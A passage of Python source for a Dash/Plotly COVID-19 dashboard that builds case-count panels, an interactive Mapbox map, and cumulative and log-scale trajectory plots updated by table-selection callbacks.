df_region_tab['Recovered']], # hovertemplate='<b>%{text}</b><br></br>' + # '%{hovertext}' + # '<extra></extra>')) #fig_cumulative_tab.add_trace(go.Scatter(x=df_region_tab['date_day'], # y=df_region_tab['Deaths'], # mode='lines+markers', # # line_shape='spline', # name='Death case', # line=dict(color='#626262', width=2), # # marker=dict(size=4, color='#f4f4f2', # # line=dict(width=1,color='#626262')), # text=[datetime.strftime(d, '%b %d %Y AEDT') for d in df_region_tab['date_day']], # hovertext=['{} Deaths<br>{:,d} cases<br>'.format('The World', i) for i in df_region_tab['Deaths']], # hovertemplate='<b>%{text}</b><br></br>' + # '%{hovertext}' + # '<extra></extra>')) # Customise layout fig_cumulative_tab.update_layout( margin=go.layout.Margin( l=10, r=10, b=10, t=5, pad=0 ), # annotations=[ # dict( # x=.5, # y=.4, # xref="paper", # yref="paper", # text='The World', # opacity=0.5, # font=dict(family='Arial, sans-serif', # size=60, # color="grey"), # ) # ], yaxis_title="Cumulative cases numbers", yaxis=dict( showline=False, linecolor='#272e3e', zeroline=False, # showgrid=False, gridcolor='rgba(203, 210, 211,.3)', gridwidth=.1, tickmode='array', # Set tick range based on the maximum number # tickvals=tickList, # Set tick label accordingly # ticktext=["{:.0f}k".format(i/1000) for i in tickList] ), xaxis_title="Select A Location From Table", xaxis=dict( showline=False, linecolor='#272e3e', showgrid=False, gridcolor='rgba(203, 210, 211,.3)', gridwidth=.1, zeroline=False ), xaxis_tickformat='%b %d', # transition = {'duration':500}, hovermode='x', legend_orientation="h", legend=dict(x=.02, y=.95, bgcolor="rgba(0,0,0,0)",), plot_bgcolor='#f4f4f2', paper_bgcolor='#cbd2d3', font=dict(color='#292929', size=10) ) # Default curve plot for tab # Create empty figure canvas fig_curve_tab = go.Figure() fig_curve_tab.add_trace(go.Scatter(x=pseduoDay, y=y1, line=dict(color='rgba(0, 0, 0, .3)', width=1, dash='dot'), text=['85% growth rate' for i in pseduoDay], hovertemplate='<b>%{text}</b><br>' + '<extra></extra>' ) ) fig_curve_tab.add_trace(go.Scatter(x=pseduoDay, y=y2, line=dict(color='rgba(0, 0, 0, .3)', width=1, dash='dot'), text=['35% growth rate' for i in pseduoDay], hovertemplate='<b>%{text}</b><br>' + '<extra></extra>' ) ) fig_curve_tab.add_trace(go.Scatter(x=pseduoDay, y=y3, line=dict(color='rgba(0, 0, 0, .3)', width=1, dash='dot'), text=['15% growth rate' for i in pseduoDay], hovertemplate='<b>%{text}</b><br>' + '<extra></extra>' ) ) fig_curve_tab.add_trace(go.Scatter(x=pseduoDay, y=y4, line=dict(color='rgba(0, 0, 0, .3)', width=1, dash='dot'), text=['5% growth rate' for i in pseduoDay], hovertemplate='<b>%{text}</b><br>' + '<extra></extra>' ) ) for regionName in ['The World', 'China', 'Japan', 'Italy', 'South Korea', 'US']: dotgrayx_tab = [np.array(dfs_curve.loc[dfs_curve['Region'] == regionName, 'DayElapsed'])[0]] dotgrayy_tab = [np.array(dfs_curve.loc[dfs_curve['Region'] == regionName, 'Confirmed'])[0]] fig_curve_tab.add_trace(go.Scatter(x=dfs_curve.loc[dfs_curve['Region'] == regionName]['DayElapsed'], y=dfs_curve.loc[dfs_curve['Region'] == regionName]['Confirmed'], mode='lines', line_shape='spline', name=regionName, opacity=0.3, line=dict(color='#636363', width=1.5), text=[ i for i in dfs_curve.loc[dfs_curve['Region'] == regionName]['Region']], hovertemplate='<b>%{text}</b><br>' + '<br>%{x} days after 100 cases<br>' + 'with %{y:,d} cases<br>' '<extra></extra>' ) ) fig_curve_tab.add_trace(go.Scatter(x=dotgrayx_tab, y=dotgrayy_tab, mode='markers', marker=dict(size=6, color='#636363', line=dict(width=1, color='#636363')), opacity=0.5, text=[regionName], hovertemplate='<b>%{text}</b><br>' + '<br>%{x} days after 100 cases<br>' + 'with %{y:,d} cases<br>' '<extra></extra>' ) ) # Customise layout fig_curve_tab.update_xaxes(range=[0, daysOutbreak-19]) fig_curve_tab.update_yaxes(range=[1.9, 6]) fig_curve_tab.update_layout( xaxis_title="Number of day since 100th confirmed cases", yaxis_title="Confirmed cases (Logarithmic)", margin=go.layout.Margin( l=10, r=10, b=10, t=5, pad=0 ), #annotations=[dict( # x=.5, # y=.4, # xref="paper", # yref="paper", # text=dfSum['Country/Region'][0] if dfSum['Country/Region'][0] in set(dfs_curve['Region']) else "Not over 100 cases", # opacity=0.5, # font=dict(family='Arial, sans-serif', # size=60, # color="grey"), # ) #], yaxis_type="log", yaxis=dict( showline=False, linecolor='#272e3e', zeroline=False, # showgrid=False, gridcolor='rgba(203, 210, 211,.3)', gridwidth = .1, ), xaxis=dict( showline=False, linecolor='#272e3e', # showgrid=False, gridcolor='rgba(203, 210, 211,.3)', gridwidth = .1, zeroline=False ), showlegend=False, # hovermode = 'x', plot_bgcolor='#f4f4f2', paper_bgcolor='#cbd2d3', font=dict(color='#292929', size=10) ) ################################################################################################## # Start dash app ################################################################################################## app = dash.Dash(__name__, assets_folder='./assets/', meta_tags=[ {"name": "author", "content": "Jun Ye"}, {"name": "description", "content": "The coronavirus COVID-19 monitor/dashboard provides up-to-date data and map for the global spread of coronavirus. In the meanwile, please keep calm, stay home and wash your hand!"}, {"property": "og:title", "content": "Coronavirus COVID-19 Outbreak Global Cases Monitor Dashboard"}, {"property": "og:type", "content": "website"}, {"property": "og:image", "content": "https://junye0798.com/post/build-a-dashboard-to-track-the-spread-of-coronavirus-using-dash/featured_hu031431b9019186307c923e911320563b_1304417_1200x0_resize_lanczos_2.png"}, {"property": "og:url", "content": "https://dash-coronavirus-2020.herokuapp.com/"}, {"property": "og:description", "content": "The coronavirus COVID-19 monitor/dashboard provides up-to-date data and map for the global spread of coronavirus. In the meanwile, please keep calm, stay home and wash your hand!"}, {"name": "twitter:card", "content": "summary_large_image"}, {"name": "twitter:site", "content": "@perishleaf"}, {"name": "twitter:title", "content": "Coronavirus COVID-19 Outbreak Global Cases Monitor Dashboard"}, {"name": "twitter:description", "content": "The coronavirus COVID-19 monitor/dashboard provides up-to-date data and map for the global spread of coronavirus. In the meanwile, please keep calm, stay home and wash your hand!"}, {"name": "twitter:image", "content": "https://junye0798.com/post/build-a-dashboard-to-track-the-spread-of-coronavirus-using-dash/featured_hu031431b9019186307c923e911320563b_1304417_1200x0_resize_lanczos_2.png"}, {"name": "viewport", "content": "width=device-width, height=device-height, initial-scale=1.0"} ] ) image_filename = './assets/TypeHuman.png' encoded_image = base64.b64encode(open(image_filename, 'rb').read()) app.title = 'Coronavirus COVID-19 Global Monitor' # Section for Google annlytic and donation # app.index_string = """<!DOCTYPE html> <html> <head> <script data-name="BMC-Widget" src="https://cdnjs.buymeacoffee.com/1.0.0/widget.prod.min.js" data-id="qPsBJAV" data-description="Support the app server for running!" data-message="Please support the app server for running!" data-color="#FF813F" data-position="right" data-x_margin="18" data-y_margin="25"></script> <!-- Global site tag (gtag.js) - Google Analytics --> <script async src="https://www.googletagmanager.com/gtag/js?id=UA-154901818-2"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'UA-154901818-2'); </script> {%metas%} <title>{%title%}</title> {%favicon%} {%css%} <script type='text/javascript' src='https://platform-api.sharethis.com/js/sharethis.js#property=5e5e32508d3a3d0019ee3ecb&product=sticky-share-buttons&cms=website' async='async'></script> </head> <body> {%app_entry%} <footer> {%config%} {%scripts%} {%renderer%} </footer> </body> </html>""" server = app.server app.config['suppress_callback_exceptions'] = True app.layout = html.Div(style={'backgroundColor': '#f4f4f2'}, children=[ html.Div( id="header", children=[ html.H4( children="Coronavirus (COVID-19) Outbreak Global Cases Monitor"), html.P( id="description", children="On Dec 31, 2019, the World Health Organization (WHO) was informed of \ an outbreak of “pneumonia of unknown cause” detected in Wuhan City, Hubei Province, China – the \ seventh-largest city in China with 11 million residents. As of {}, there are over {:,d} cases \ of COVID-19 confirmed globally.\ This dash board is developed to visualise and track the recent reported \ cases on a hourly timescale.".format(latestDate, confirmedCases), ), # html.P( # id="note", # children=['⚠️ Source from ', # html.A('The National Health Commission of China', href='http://www.nhc.gov.cn/yjb/s7860/202002/553ff43ca29d4fe88f3837d49d6b6ef1.shtml'), # ': in its February 14 official report, deducted \ # 108 previously reported deaths and 1,043 previously reported cases from the total in Hubei Province due to "repeated counting." \ # Data have been corrected for these changes.'] # ), # html.P( # id="note", # children=['⚠️ Source from ', # html.A('读卖新闻', href='https://www.yomiuri.co.jp/national/20200216-OYT1T50089/'), # ': Diamond Princess cruise confirmed 70 new infections, bringing the total infected cases to 355.'] # ), # html.P( # id="note", # children=['⚠️ Source from ', # html.A('anews', href='http://www.anews.com.tr/world/2020/02/21/iran-says-two-more-deaths-among-13-new-coronavirus-cases'), # ': Iran\'s health ministry Friday reported two more deaths among 13 new cases of coronavirus in the Islamic republic, bringing the total number of deaths to four and infections to 18.'] # ), # html.P( # id="note", # children=['⚠️ Source from ', # html.A('The New York Times', href='https://www.nytimes.com/2020/03/01/world/coronavirus-news.html'), # ': New York State Reports First Case.'] # ), html.P( id='time-stamp', # style={'fontWeight':'bold'}, children="🔴 Last update: {}".format(latestDate)) ] ), html.Div( id="number-plate", style={'marginLeft': '1.5%', 'marginRight': '1.5%', 'marginBottom': '.5%'}, children=[ #html.Hr(), html.Div( style={'width': '24.4%', 'backgroundColor': '#cbd2d3', 'display': 'inline-block', 'marginRight': '.8%', 'verticalAlign': 'top'}, children=[ html.H3(style={'textAlign': 'center', 'fontWeight': 'bold', 'color': '#2674f6'}, children=[ html.P(style={'color': '#cbd2d3', 'padding': '.5rem'}, children='xxxx xx xxx xxxx xxx xxxxx'), '{}'.format(daysOutbreak), ]), html.H5(style={'textAlign': 'center', 'color': '#2674f6', 'padding': '.1rem'}, children="Days Since Outbreak") ]), html.Div( style={'width': '24.4%', 'backgroundColor': '#cbd2d3', 'display': 'inline-block', 'marginRight': '.8%', 'verticalAlign': 'top'}, children=[ html.H3(style={'textAlign': 'center', 'fontWeight': 'bold', 'color': '#d7191c'}, children=[ html.P(style={'padding': '.5rem'}, children='+ {:,d} in the past 24h ({:.1%})'.format(plusConfirmedNum, plusPercentNum1)), '{:,d}'.format( confirmedCases) ]), html.H5(style={'textAlign': 'center', 'color': '#d7191c', 'padding': '.1rem'}, children="Confirmed Cases") ]), html.Div( style={'width': '24.4%', 'backgroundColor': '#cbd2d3', 'display': 'inline-block', 'marginRight': '.8%', 'verticalAlign': 'top'}, children=[ html.H3(style={'textAlign': 'center', 'fontWeight': 'bold', 'color': '#1a9622'}, children=[ html.P(style={'padding': '.5rem'}, children='+ {:,d} in the past 24h ({:.1%})'.format(plusRecoveredNum, plusPercentNum2)), '{:,d}'.format( recoveredCases), ]), html.H5(style={'textAlign': 'center', 'color': '#1a9622', 'padding': '.1rem'}, children="Recovered Cases") ]), html.Div( style={'width': '24.4%', 'backgroundColor': '#cbd2d3', 'display': 'inline-block', 'verticalAlign': 'top'}, children=[ html.H3(style={'textAlign': 'center', 'fontWeight': 'bold', 'color': '#6c6c6c'}, children=[ html.P(style={'padding': '.5rem'}, children='+ {:,d} in the past 24h ({:.1%})'.format(plusDeathNum, plusPercentNum3)), '{:,d}'.format(deathsCases) ]), html.H5(style={'textAlign': 'center', 'color': '#6c6c6c', 'padding': '.1rem'}, children="Death Cases") ]) ]), html.Div( id='dcc-plot', style={'marginLeft': '1.5%', 'marginRight': '1.5%', 'marginBottom': '.35%', 'marginTop': '.5%'}, children=[ html.Div( style={'width': '32.79%', 'display': 'inline-block', 'marginRight': '.8%', 'verticalAlign': 'top'}, children=[ html.H5(style={'textAlign': 'center', 'backgroundColor': '#cbd2d3', 'color': '#292929', 'padding': '1rem', 'marginBottom': '0'}, children='Confirmed Case Timeline'), dcc.Graph(style={'height': '300px'}, figure=fig_confirmed)]), html.Div( style={'width': '32.79%', 'display': 'inline-block', 'marginRight': '.8%', 'verticalAlign': 'top'}, children=[ html.H5(style={'textAlign': 'center', 'backgroundColor': '#cbd2d3', 'color': '#292929', 'padding': '1rem', 'marginBottom': '0'}, children='Remaining/Recovered/Death Case Timeline'), dcc.Graph(style={'height': '300px'}, figure=fig_combine)]), html.Div( style={'width': '32.79%', 'display': 'inline-block', 'verticalAlign': 'top'}, children=[ html.H5(style={'textAlign': 'center', 'backgroundColor': '#cbd2d3', 'color': '#292929', 'padding': '1rem', 'marginBottom': '0'}, children='Death Rate (%) Timeline'), dcc.Graph(style={'height': '300px'}, figure=fig_rate)])]), html.Div( id='dcc-map', style={'marginLeft': '1.5%', 'marginRight': '1.5%', 'marginBottom': '.5%'}, children=[ html.Div(style={'width': '66.41%', 'marginRight': '.8%', 'display': 'inline-block', 'verticalAlign': 'top'}, children=[ html.H5(style={'textAlign': 'center', 'backgroundColor': '#cbd2d3', 'color': '#292929', 'padding': '1rem', 'marginBottom': '0'}, children='Latest Coronavirus Outbreak Map'), dcc.Graph( id='datatable-interact-map', style={'height': '500px'},), dcc.Tabs( id="tabs-plots", value='Cumulative Cases', parent_className='custom-tabs', className='custom-tabs-container', children=[dcc.Tab(className='custom-tab', selected_className='custom-tab--selected', label='Cumulative Cases', value='Cumulative Cases'), dcc.Tab(className='custom-tab', selected_className='custom-tab--selected', label='Confirmed Case Trajectories', value='Confirmed Case Trajectories'), ] ), html.Div(id='tabs-content-plots'), ]), html.Div(style={'width': '32.79%', 'display': 'inline-block', 'verticalAlign': 'top'}, children=[ html.H5(style={'textAlign': 'center', 'backgroundColor': '#cbd2d3', 'color': '#292929', 'padding': '1rem', 'marginBottom': '0'}, children='Cases by Country/Region'), dcc.Tabs( id="tabs-table", value='The World', parent_className='custom-tabs', className='custom-tabs-container', children=[ dcc.Tab(label='The World', value='The World', className='custom-tab', selected_className='custom-tab--selected', children=[ dash_table.DataTable( id='datatable-interact-location', # Don't show coordinates columns=[{"name": i, "id": i} for i in dfSum.columns[0:5]], # But still store coordinates in the table for interactivity data=dfSum.to_dict( "rows"), row_selectable="single", sort_action="native", style_as_list_view=True, style_cell={'font_family': 'Arial', 'font_size': '1.2rem', 'padding': '.1rem', 'backgroundColor': '#f4f4f2', }, fixed_rows={ 'headers': True, 'data': 0}, style_table={'minHeight': '800px', 'height': '800px', 'maxHeight': '800px'}, style_header={'backgroundColor': '#f4f4f2', 'fontWeight': 'bold'}, style_cell_conditional=[{'if': {'column_id': 'Country/Regions'}, 'width': '28%'}, {'if': { 'column_id': 'Remaining'}, 'width': '18%'}, {'if': { 'column_id': 'Confirmed'}, 'width': '18%'}, {'if': { 'column_id': 'Recovered'}, 'width': '18%'}, {'if': { 'column_id': 'Deaths'}, 'width': '18%'}, {'if': { 'column_id': 'Remaining'}, 'color':'#e36209'}, {'if': { 'column_id': 'Confirmed'}, 'color': '#d7191c'}, {'if': { 'column_id': 'Recovered'}, 'color': '#1a9622'}, {'if': { 'column_id': 'Deaths'}, 'color': '#6c6c6c'}, {'textAlign': 'center'}], ) ]), make_dcc_country_tab( 'Australia', AUSTable), make_dcc_country_tab( 'Canada', CANTable), make_dcc_country_tab( 'Mainland China', CNTable), make_dcc_country_tab( 'United States', USTable), #make_dcc_country_tab( # 'Schengen', EuroTable), ] ) ]) ]), html.Div( id='my-footer', style={'marginLeft': '1.5%', 'marginRight': '1.5%', 'marginBottom': '1%', 'marginTop': '.5%'}, children=[ html.Hr(style={'marginBottom': '.5%'},), html.P(style={'textAlign': 'center', 'margin': 'auto'}, children=['Keep calm and stay home | ', html.A('Developed by Jun with ❤️ in Sydney', href='https://junye0798.com/'), ' | ', html.A('About this dashboard', href='https://github.com/Perishleaf/data-visualisation-scripts/tree/master/dash-2019-coronavirus',target='_blank'), " | ", html.A('Report a bug', href='https://twitter.com/perishleaf', target='_blank') ] ), html.P(style={'textAlign': 'center', 'margin': 'auto', 'marginTop': '.5%'}, children=['Proudly supported by'] ), html.P(style={'textAlign': 'center', 'margin': 'auto', 'marginTop': '.5%'}, children=[html.A(html.Img(style={'height' : '10%', 'width' : '10%',}, src=app.get_asset_url('TypeHuman.png')), href='https://www.typehuman.com/', target='_blank')] ) ] ), ]) @app.callback( Output('datatable-interact-map', 'figure'), [Input('tabs-table', 'value'), Input('datatable-interact-location', 'derived_virtual_selected_rows'), Input('datatable-interact-location', 'selected_row_ids'), Input('datatable-interact-location-Australia', 'derived_virtual_selected_rows'), Input('datatable-interact-location-Australia', 'selected_row_ids'), Input('datatable-interact-location-Canada', 'derived_virtual_selected_rows'), Input('datatable-interact-location-Canada', 'selected_row_ids'), Input('datatable-interact-location-Mainland China', 'derived_virtual_selected_rows'), Input('datatable-interact-location-Mainland China', 'selected_row_ids'), Input('datatable-interact-location-United States', 'derived_virtual_selected_rows'), Input('datatable-interact-location-United States', 'selected_row_ids'), ] ) def update_figures(value, derived_virtual_selected_rows, selected_row_ids, Australia_derived_virtual_selected_rows, Australia_selected_row_ids, Canada_derived_virtual_selected_rows, Canada_selected_row_ids, CHN_derived_virtual_selected_rows, CHN_selected_row_ids, US_derived_virtual_selected_rows, US_selected_row_ids ): # When the table is first rendered, `derived_virtual_data` and # `derived_virtual_selected_rows` will be `None`. This is due to an # idiosyncracy in Dash (unsupplied properties are always None and Dash # calls the dependent callbacks when the component is first rendered). # So, if `rows` is `None`, then the component was just rendered # and its value will be the same as the component's dataframe. # Instead of setting `None` in here, you could also set # `derived_virtual_data=df.to_rows('dict')` when you initialize # the component. if value == 'The World': if derived_virtual_selected_rows is None: derived_virtual_selected_rows = [] dff = dfSum latitude = 14.056159 if len(derived_virtual_selected_rows) == 0 else dff.loc[selected_row_ids[0]].lat longitude = 6.395626 if len(derived_virtual_selected_rows) == 0 else dff.loc[selected_row_ids[0]].lon zoom = 1.02 if len(derived_virtual_selected_rows) == 0 else 4 elif value == 'Australia': if Australia_derived_virtual_selected_rows is None: Australia_derived_virtual_selected_rows = [] dff = AUSTable latitude = -25.931850 if len(Australia_derived_virtual_selected_rows) == 0 else dff.loc[Australia_selected_row_ids[0]].lat longitude = 134.024931 if len(Australia_derived_virtual_selected_rows) == 0 else dff.loc[Australia_selected_row_ids[0]].lon zoom = 3 if len(Australia_derived_virtual_selected_rows) == 0 else 5 elif value == 'Canada': if Canada_derived_virtual_selected_rows is None: Canada_derived_virtual_selected_rows = [] dff = CANTable latitude = 55.474012 if len(Canada_derived_virtual_selected_rows) == 0 else dff.loc[Canada_selected_row_ids[0]].lat longitude = -97.344913 if len(Canada_derived_virtual_selected_rows) == 0 else dff.loc[Canada_selected_row_ids[0]].lon zoom = 3 if len(Canada_derived_virtual_selected_rows) == 0 else 5 elif value == 'Mainland China': if CHN_derived_virtual_selected_rows is None: CHN_derived_virtual_selected_rows = [] dff = CNTable latitude = 33.471197 if len(CHN_derived_virtual_selected_rows) == 0 else dff.loc[CHN_selected_row_ids[0]].lat longitude = 106.206780 if len(CHN_derived_virtual_selected_rows) == 0 else dff.loc[CHN_selected_row_ids[0]].lon zoom = 2.5 if len(CHN_derived_virtual_selected_rows) == 0 else 5 elif value == 'United States': if US_derived_virtual_selected_rows is None: US_derived_virtual_selected_rows = [] dff = USTable latitude = 40.022092 if len(US_derived_virtual_selected_rows) == 0 else dff.loc[US_selected_row_ids[0]].lat longitude = -98.828101 if len(US_derived_virtual_selected_rows) == 0 else dff.loc[US_selected_row_ids[0]].lon zoom = 3 if len(US_derived_virtual_selected_rows) == 0 else 5 mapbox_access_token = "pk.eyJ1IjoicGxvdGx5bWFwYm94IiwiYSI6ImNqdnBvNDMyaTAxYzkzeW5ubWdpZ2VjbmMifQ.TXcBE-xg9BFdV2ocecc_7g" # Generate a list for hover text display textList = [] for area, region in zip(df_latest['Province/State'], df_latest['Country/Region']): if type(area) is str: if region == "Hong Kong" or region == "Macau" or region == "Taiwan": textList.append(area) else: textList.append(area+', '+region) else: textList.append(region) # Generate a list for color gradient display colorList = [] for comfirmed, recovered, deaths in zip(df_latest['Confirmed'], df_latest['Recovered'], df_latest['Deaths']): remaining = comfirmed - deaths - recovered colorList.append(remaining) fig2 = go.Figure(go.Scattermapbox( lat=df_latest['lat'], lon=df_latest['lon'], mode='markers', marker=go.scattermapbox.Marker( color=['#d7191c' if i > 0 else '#1a9622' for i in colorList], size=[i**(1/3) for i in df_latest['Confirmed']], sizemin=1, sizemode='area', sizeref=2.*max([math.sqrt(i) for i in df_latest['Confirmed']])/(100.**2), ), text=textList, hovertext=['Confirmed: {:,d}<br>Recovered: {:,d}<br>Death: {:,d}'.format(i, j, k) for i, j, k in zip(df_latest['Confirmed'], df_latest['Recovered'], df_latest['Deaths'])], hovertemplate="<b>%{text}</b><br><br>" + "%{hovertext}<br>" + "<extra></extra>") ) fig2.update_layout( plot_bgcolor='#151920', paper_bgcolor='#cbd2d3', margin=go.layout.Margin(l=10, r=10, b=10, t=0, pad=40), hovermode='closest', transition={'duration': 50}, annotations=[ dict( x=.5, y=-.01, align='center', showarrow=False, text="Points are placed based on data geolocation levels.<br>Province/State level - Australia, China, Canada, and United States; Country level- other countries.", xref="paper", yref="paper", font=dict(size=10, color='#292929'), )], mapbox=go.layout.Mapbox( accesstoken=mapbox_access_token, style="light", # The direction you're facing, measured clockwise as an angle from true north on a compass bearing=0, center=go.layout.mapbox.Center( lat=latitude, lon=longitude ), pitch=0, zoom=zoom ) ) return fig2 @app.callback(Output('tabs-content-plots', 'children'), [Input('tabs-plots', 'value')]) def render_content(tab): if tab == 'Cumulative Cases': return dcc.Graph(id='datatable-interact-lineplot', style={'height': '300px'}, figure=fig_cumulative_tab,) elif tab == 'Confirmed Case Trajectories': return dcc.Graph(id='datatable-interact-logplot', style={'height': '300px'}, figure=fig_curve_tab,) @app.callback( Output('datatable-interact-lineplot', 'figure'), [Input('tabs-table', 'value'), Input('datatable-interact-location', 'derived_virtual_selected_rows'), Input('datatable-interact-location', 'selected_row_ids'), Input('datatable-interact-location-Australia', 'derived_virtual_selected_rows'), Input('datatable-interact-location-Australia', 'selected_row_ids'), Input('datatable-interact-location-Canada', 'derived_virtual_selected_rows'), Input('datatable-interact-location-Canada', 'selected_row_ids'), Input('datatable-interact-location-Mainland China', 'derived_virtual_selected_rows'), Input('datatable-interact-location-Mainland China', 'selected_row_ids'), Input('datatable-interact-location-United States', 'derived_virtual_selected_rows'), Input('datatable-interact-location-United States', 'selected_row_ids'), ] ) def update_lineplot(value, derived_virtual_selected_rows, selected_row_ids, Australia_derived_virtual_selected_rows, Australia_selected_row_ids, Canada_derived_virtual_selected_rows, Canada_selected_row_ids, CHN_derived_virtual_selected_rows, CHN_selected_row_ids, US_derived_virtual_selected_rows, US_selected_row_ids ): if value == 'The World': if derived_virtual_selected_rows is None: derived_virtual_selected_rows = [] dff = dfSum if selected_row_ids: if dff.loc[selected_row_ids[0]]['Country/Region'] == 'Mainland China': Region = 'China' else: Region = dff.loc[selected_row_ids[0]]['Country/Region'] else: Region = 'The World' # Display the global total case number elif value == 'Australia': if Australia_derived_virtual_selected_rows is None: Australia_derived_virtual_selected_rows = [] dff = AUSTable if Australia_selected_row_ids: Region = dff.loc[Australia_selected_row_ids[0]]['Province/State'] else: Region = 'Australia' elif value == 'Canada': if Canada_derived_virtual_selected_rows is None: Canada_derived_virtual_selected_rows = [] dff = CANTable if Canada_selected_row_ids: Region = dff.loc[Canada_selected_row_ids[0]]['Province/State'] else: Region = 'Canada' elif value == 'Mainland China': if Canada_derived_virtual_selected_rows is None: Canada_derived_virtual_selected_rows = [] dff = CNTable if CHN_selected_row_ids: Region = dff.loc[CHN_selected_row_ids[0]]['Province/State'] else: Region = 'China' elif value == 'United States': if Canada_derived_virtual_selected_rows is None: Canada_derived_virtual_selected_rows = [] dff = USTable if US_selected_row_ids: Region = dff.loc[US_selected_row_ids[0]]['Province/State'] else: Region = 'US' # Read cumulative data of a given region from ./cumulative_data folder df_region = pd.read_csv('./cumulative_data/{}.csv'.format(Region)) df_region = df_region.astype( {'Date_last_updated_AEDT': 'datetime64', 'date_day': 'datetime64'}) # Line plot for confirmed cases # Set up tick scale based on confirmed case number # tickList = list(np.arange(0, df_confirmed['Mainland China'].max()+1000, 10000)) # Create empty figure canvas fig3 = go.Figure() # Add trace to the figure fig3.add_trace(go.Scatter(x=df_region['date_day'], y=df_region['Confirmed'], mode='lines+markers', # line_shape='spline', name='Confirmed case', line=dict(color='#d7191c', width=2), # marker=dict(size=4, color='#f4f4f2', # line=dict(width=1,color='#921113')), text=[datetime.strftime(d, '%b %d %Y AEDT') for d in df_region['date_day']], hovertext=['{} Confirmed<br>{:,d} cases<br>'.format( Region, i) for i in df_region['Confirmed']], hovertemplate='<b>%{text}</b><br></br>' + '%{hovertext}' + '<extra></extra>')) fig3.add_trace(go.Scatter(x=df_region['date_day'], y=df_region['Recovered'], mode='lines+markers', # line_shape='spline', name='Recovered case', line=dict(color='#1a9622', width=2), # marker=dict(size=4, color='#f4f4f2', # line=dict(width=1,color='#168038')), text=[datetime.strftime(d, '%b %d %Y AEDT') for d in df_region['date_day']], hovertext=['{} Recovered<br>{:,d} cases<br>'.format( Region, i) for i in df_region['Recovered']], hovertemplate='<b>%{text}</b><br></br>' + '%{hovertext}' + '<extra></extra>')) fig3.add_trace(go.Scatter(x=df_region['date_day'], y=df_region['Deaths'], mode='lines+markers', # line_shape='spline', name='Death case', line=dict(color='#626262', width=2), # marker=dict(size=4, color='#f4f4f2', # line=dict(width=1,color='#626262')), text=[datetime.strftime(d, '%b %d %Y AEDT') for d in df_region['date_day']], hovertext=['{} Deaths<br>{:,d} cases<br>'.format( Region, i) for i in df_region['Deaths']], hovertemplate='<b>%{text}</b><br></br>' + '%{hovertext}' + '<extra></extra>')) # Customise layout fig3.update_layout( margin=go.layout.Margin( l=10, r=10, b=10, t=5, pad=0 ), annotations=[ dict( x=.5, y=.4, xref="paper", yref="paper", text=Region, opacity=0.5, font=dict(family='Arial, sans-serif', size=60, color="grey"), ) ], yaxis_title="Cumulative cases numbers", yaxis=dict( showline=False, linecolor='#272e3e', zeroline=False, # showgrid=False, gridcolor='rgba(203, 210, 211,.3)', gridwidth=.1, tickmode='array', # Set tick range based on the maximum number # tickvals=tickList, # Set tick label accordingly # ticktext=["{:.0f}k".format(i/1000) for i in tickList] ), xaxis_title="Select A Location From Table", xaxis=dict( showline=False, linecolor='#272e3e', showgrid=False, gridcolor='rgba(203, 210, 211,.3)', gridwidth=.1, zeroline=False ), xaxis_tickformat='%b %d', # transition = {'duration':500}, hovermode='x', legend_orientation="h", legend=dict(x=.02, y=.95, bgcolor="rgba(0,0,0,0)",), plot_bgcolor='#f4f4f2', paper_bgcolor='#cbd2d3', font=dict(color='#292929', size=10) ) return fig3 @app.callback( Output('datatable-interact-logplot', 'figure'), [Input('tabs-table', 'value'), Input('datatable-interact-location', 'derived_virtual_selected_rows'), Input('datatable-interact-location', 'selected_row_ids'), Input('datatable-interact-location-Australia', 'derived_virtual_selected_rows'), Input('datatable-interact-location-Australia', 'selected_row_ids'), Input('datatable-interact-location-Canada', 'derived_virtual_selected_rows'), Input('datatable-interact-location-Canada', 'selected_row_ids'), Input('datatable-interact-location-Mainland China', 'derived_virtual_selected_rows'), Input('datatable-interact-location-Mainland China', 'selected_row_ids'), Input('datatable-interact-location-United States', 'derived_virtual_selected_rows'), Input('datatable-interact-location-United States', 'selected_row_ids'), ] ) def update_logplot(value, derived_virtual_selected_rows, selected_row_ids, Australia_derived_virtual_selected_rows, Australia_selected_row_ids, Canada_derived_virtual_selected_rows, Canada_selected_row_ids, CHN_derived_virtual_selected_rows, CHN_selected_row_ids, US_derived_virtual_selected_rows, US_selected_row_ids ): if value == 'The World': if derived_virtual_selected_rows is None: derived_virtual_selected_rows = [] dff = dfSum elapseDay = daysOutbreak if selected_row_ids: if dff.loc[selected_row_ids[0]]['Country/Region'] == 'Mainland China': Region = 'China' else: Region = dff.loc[selected_row_ids[0]]['Country/Region'] else: Region = 'The World' elif value == 'Australia': if Australia_derived_virtual_selected_rows is None: Australia_derived_virtual_selected_rows = [] dff = AUSTable elapseDay = daysOutbreak if Australia_selected_row_ids: Region = dff.loc[Australia_selected_row_ids[0]]['Province/State'] else: Region = 'Australia' elif value == 'Canada': if Canada_derived_virtual_selected_rows is None: Canada_derived_virtual_selected_rows = [] dff = CANTable elapseDay = daysOutbreak if Canada_selected_row_ids: Region = dff.loc[Canada_selected_row_ids[0]]['Province/State'] else: Region = 'Canada' elif value == 'Mainland China': if CHN_derived_virtual_selected_rows is None: CHN_derived_virtual_selected_rows = [] dff = CNTable elapseDay = daysOutbreak if CHN_selected_row_ids: Region = dff.loc[CHN_selected_row_ids[0]]['Province/State'] else: Region = 'China' elif value == 'United States': if US_derived_virtual_selected_rows is None: US_derived_virtual_selected_rows = [] dff = USTable elapseDay = daysOutbreak if US_selected_row_ids: Region = dff.loc[US_selected_row_ids[0]]['Province/State'] else: Region = 'US' # Create empty figure canvas fig_curve = go.Figure() fig_curve.add_trace(go.Scatter(x=pseduoDay, y=y1, line=dict(color='rgba(0, 0, 0, .3)', width=1, dash='dot'), text=[ '85% growth rate' for i in pseduoDay], hovertemplate='<b>%{text}</b><br>' + '<extra></extra>' ) ) fig_curve.add_trace(go.Scatter(x=pseduoDay, y=y2, line=dict(color='rgba(0, 0, 0, .3)', width=1, dash='dot'), text=[ '35% growth rate' for i in pseduoDay], hovertemplate='<b>%{text}</b><br>' + '<extra></extra>' ) ) fig_curve.add_trace(go.Scatter(x=pseduoDay, y=y3, line=dict(color='rgba(0, 0, 0, .3)', width=1, dash='dot'), text=[ '15% growth rate' for i in pseduoDay], hovertemplate='<b>%{text}</b><br>' + '<extra></extra>' ) ) fig_curve.add_trace(go.Scatter(x=pseduoDay, y=y4, line=dict(color='rgba(0, 0, 0, .3)', width=1, dash='dot'), text=[ '5% growth rate' for i in pseduoDay], 